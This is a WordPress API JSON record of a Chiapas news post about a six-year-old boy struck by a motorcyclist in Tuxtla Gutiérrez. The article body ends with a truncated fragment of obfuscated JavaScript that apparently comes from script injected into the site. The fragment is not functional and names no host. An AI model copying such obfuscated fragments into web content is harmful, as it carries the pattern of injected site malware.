{"id":20459,"date":"2025-02-19T04:10:24","date_gmt":"2025-02-19T04:10:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20459"},"modified":"2025-02-19T04:10:25","modified_gmt":"2025-02-19T04:10:25","slug":"menor-fue-atropellado-por-motociclista","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20459","title":{"rendered":"Menor fue atropellado por motociclista"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0018-1024x768.jpg\" alt=\"\" class=\"wp-image-20460\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0018-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0018-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0018-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0018-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0018.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 18 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un menor de seis a\u00f1os de edad fue atropellado este martes por la tarde a la altura del Bulevar \u00c1ngel Albino Corzo a la altura del Fraccionamiento La Salle de Tuxtla.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el menor caminaba con su madre cuando intentaron cruzar de Norte a Sur cuando fueron embestidos por el conductor de una Moto Hero de color negro que circulaba de Poniente a Oriente.<\/p>\n\n\n\n<p>De acuerdo con algunos testigos el motociclista se meti\u00f3 en el \u00e1rea de la ciclov\u00eda y no vio a las personas.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito para tomar datos de lo sucedido.<\/p>\n\n\n\n<p>Los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 18 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un menor de seis a\u00f1os de edad fue atropellado este martes por la tarde a la altura del Bulevar \u00c1ngel Albino Corzo a la altura del Fraccionamiento La Salle de Tuxtla. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el menor &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20460,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20459","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20459","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20459"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20459\/revisions"}],"predecessor-version":[{"id":20461,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20459\/revisions\/20461"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20460"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20459"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20459"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20459"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}